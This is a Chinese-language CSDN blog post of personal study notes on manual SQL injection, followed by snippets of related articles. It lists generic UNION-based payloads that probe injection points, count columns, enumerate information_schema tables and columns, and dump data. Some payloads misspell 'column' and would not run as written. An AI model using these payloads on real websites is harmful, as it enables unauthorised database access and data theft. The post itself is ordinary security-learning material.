学习随笔之SQL手工注入的总结

最新推荐文章于 2024-06-20 17:07:42 发布
置顶 最新推荐文章于 2024-06-20 17:07:42 发布
阅读量334 收藏 1
点赞数
分类专栏: study 文章标签: sql inject
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tuzi0739/article/details/79673760
版权

众所周之,SQL注入无非就是两种手段,手工注入和sqlmap


SQLMAP作为一种工具,比较简单粗暴

但有时候,需要用到手工注入来实现效果,或者做题目。


我们现在就来讲一下我这段时间所学的手工注入的总结吧


寻找注入点

通过'   以及and 1=1 
and 1=2  等字符来判断是否存在注入点
然后猜出该字段
order by X (猜字段)
联合查询
php?id=1 union select 1,2,3,X --
根据回显字段号,使用函数,或者查询
函数:
user()
database()
version()
@@version_compile_os
concat()


usage:

concat(user(),database(),colunm都可以)


先查数据库名字
php?id=1 union select 1,database(),3,X --
再是查表
php?id=1 union select 1,table_name,3,X from information_schema.tables where table_schema = "库名" limit 1,1

再通过表名查列名

php?id=1 union select 1,colunm_name,3,X from information_schema.colunms where table_name = "表名" limit 1,1

最后就是
union select 1,列名,X,X from 表名
出结果
 
tuzi0739
关注
专栏目录
生活随笔学习总结.doc
11-01
这篇文档实际上是对个人学习生活感悟的总结,虽然标签为"方案",但内容更偏向于个人体验和情感表达。从这段文字中,我们可以提炼出以下几个与学习、生活和自我认知相关的知识点: 1. 学习环境的影响:作者提到在...
sql手工注入
admin的博客
10-27 853
按照数据提交的方式来分类 友情链接:https://www.cnblogs.com/-chenxs/p/11614129.html、https://www.cnblogs.com/p0pl4r/p/10320631.html (1)GET 注入 提交数据的方式是 GET , 注入点的位置在 GET 参数部分。比如有这样的一个链接http://xxx.com/news.php?id=1 , id 是注入点。 (2)POST 注入 使用 POST 方式提交数据,注入点位置在 POST 数据部分,常发生在表单中。
手工SQL注入流程与常用语句
LCW991207的博客
01-26 1829
如下代码和截图所示,展示了获取数据库中表的信息,information_schema是MySql自带的信息数据库,用于存储数据库元数据(关于数据的数据),例如数据库名、表名、列的数据类型、访问权限等,其中的表实际上都是视图。在这一步中,尝试去猜测出查询语句中的字段个数,如下注入语句所示,假设为字符型注入,先利用1’实现引号闭环,再利用or 1=1这样可以暴露出表中所有的数据,最后利用order by num#去看是否报错来明确查询语句中的字段数,其中#号用于截断sql查询语句。查flag表记录的数量。
手工操作几种常见SQL注入
最新发布
X1DD1Asad343的博客
06-20 1320
是一种结合数据库原始报错信息和union查询的注入方式使用场景:数据库中查询的结果能够直接在前端页面中展示出来。
SQL手工注入方法
2301_78145678的博客
06-10 150
核心原理: MySql内置的infromation_schema库,它功能强大,是我们进行MySql注入的基石!
MySQL手工注入
xiao_he0123的博客
03-16 3791
MySQL手工注入基本知识前言一、SQL注入的原理二,如何判断是否有注入点三、步骤1.MySQL信息收集2.数据注入四,案例演示1.判断是否有注入点2.确认字段数3.判断回显点4.查询相关内容1查询库名2.查询版本号3.查询数据库表名4.查询列名信息5.查询具体数据 前言 此次文章建立在MySQL数据库的基础上 一、SQL注入的原理 可控变量带入数据库查询,变量未存在过滤或者过滤不完整 二,如何判断是否有注入点 and 1=1页面正常 and 1=2页面错误则表明有注入点 同时也可以对参数随意赋值判断如果
生活随笔学习总结.docx
10-07
这篇文档实际上并不是关于技术的知识点,而是作者的生活随笔和个人兴趣的描述。但从中我们可以提炼出几个与技术稍微相关的主题: 1. **生物学习与观察**:作者在描述自己上课时观察昆虫的情况,这涉及到生物学知识...
OpenCV图像处理学习随笔
03-07
在OpenCV图像处理的学习中,我们首先会接触到的是图像的基础操作。OpenCV是一个强大的计算机视觉库,它提供了丰富的函数和工具,使得图像处理变得简单易行。以下将详细阐述标题和描述中提到的关键知识点。 1. **...
javascript学习随笔(编写浏览器脚本 Navigator Scripting )
10-31
javascript学习随笔(编写浏览器脚本 Navigator Scripting ) javascript是一种脚本语言,经常用于浏览器脚本编写,可以嵌入HTML中,以两种方式:作为语句和函数使用时,使用SCRIPT标记;作为事件处理程序使用时,...
awt开发工具学习随笔
05-19
本文将探讨在Java学习过程中涉及到的一些关键知识点,包括图像处理、窗口布局、事件处理以及如何利用Apache POI库处理Excel文件。 1. 图像处理与窗口: AWT和Swing提供了丰富的组件,如JFrame、JButton和JLabel,...
mysql 手工注入语句总结_[总结]SQL手工注入总结
weixin_28783937的博客
01-27 333
虽说目前互联网上已经有很多关于 sql 注入的神器了,但是在这个 WAF 横行的时代,手工注入往往在一些真实环境中会显得尤为重要。本文主要把以前学过的知识做个总结,不会有详细的知识解读,类似于查询手册的形式,便于以后的复习与查阅,文中内容可能会存在错误,望师傅们斧正!0x01 Mysql 手工注入1.1 联合注入?id=1' order by 4--+?id=0' union select 1,2...
SQL手工注入
Megumiwind的博客
08-08 1752
什么是SQL注入SQLi,sql injection,称之为SQL注入。何为SQL,英文:Structured Query Language,又叫结构化查询语言,用户在输入中注入SQL语法,破坏原有的SQL结构,达到编写程序时意料之外结果的攻击行为,被称为sql注入。 如何找到SQL注入点: 黑盒测试: 看见URL中的动态参数就想搞点事情,概念性验证 工具跑,老夫就是江湖人称脚本小子的物种 扫描器(AWVS等)扫+手动验证 Burp抓流量,调用SQLMAP API验证 代码审计 ...
SQL 注入SQL Injection)学习心得
coldsummer23的博客
11-07 2992
网工小白学习安全心得,学习web渗透第一章sql注入,本文仅仅简单介绍了SQL注入的流程,SQL注入的原理,以一次完整的字符型SQL注入流程为例,其余三种都是基于这个思路,只是应对于不同的防护用不同的手段。思路重点在于明白最终想要的是数据库中的内容,怎么一步步去获得里面的数据。
SQL注入详解(第二章手工注入
m0_52051132的博客
09-17 2756
mysql中存在4个控制权限的表,分别为user表,db表,tables_priv表,columns_priv表,我当前的版本mysql 5.7.22。mysql权限表的验证过程为:先从user表中的Host,User,Password这3个字段中判断连接的ip、用户名、密码是否存在,存在则通过验证。通过身份认证后,进行权限分配,按照user,db,tables_priv,columns_priv的顺序进行验证。
SQL注入基础总结
IerkeU的博客
12-09 4241
一、什么是SQL注入? 答:SQL注入是比较常见的网络攻击方式之一,它不是利用OS的BUG来实现攻击,而是针对程序员编写时的疏忽,通过SQL语句实现无账号登陆,甚至篡改数据库。 二、SQL注入的原理? 答:SQL注入攻击通过构建特殊的输入语句作为参数传入web应用程序,指的是服务器对用户输入数据过滤不严,导致服务器SQL语句被恶意篡改并成功 SQL注入的危害? 当我们访问动态网页时, Web 服务器会向数据访问层发起 Sql 查询请求,如果权限验证通过就会执行 Sql 语句。 SQL注入带来的危害主要有如
SQL注入原理
雅戈洛夫的博客
05-28 584
title: SQL注入原理 date: 2021-4-29 tags: 渗透测试,CTF,SQL注入,基础 categories: 渗透测试 CTF SQL注入 基础 SQL注入原理 当客户端提交的数据未作处理或转义直接带入数据库,就造成了sql注入。 攻击者通过构造不同的sql语句来实现对数据库的任意操作。 SQL注入分类 按变量类型分: 数字型 字符型 按HTTP提交方式分: POST注入 GIT注入 Cookie注入注入方式分: 布尔注入 联合注入 多语句注入 报错注入 延时注入 .
Access数据库手工注入
IerkeU的博客
11-28 1778
ACCESS数据库手工注入 access数据库 是一种非常简单但是功能完整的数据库,很适合小型网站创建,可以很轻松管理表和列,有很多管理工具。 access数据库结构? access数据库是这么个结构: 表名---->列名---->内容数据 他不像其他的数据库一样、里面创建多个数据库然后才是表再是内容、而access的话只有一个库若干张表。 access注入基本流程? 判断有没有注入点 猜解表名 猜解字段 猜解管理员ID值 猜解用户名和密码长度 猜解用户名和密码 ASP的
SQL手工注入学习总结
热门推荐
R4bbit
06-29 1万+
sql手工注入~~
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值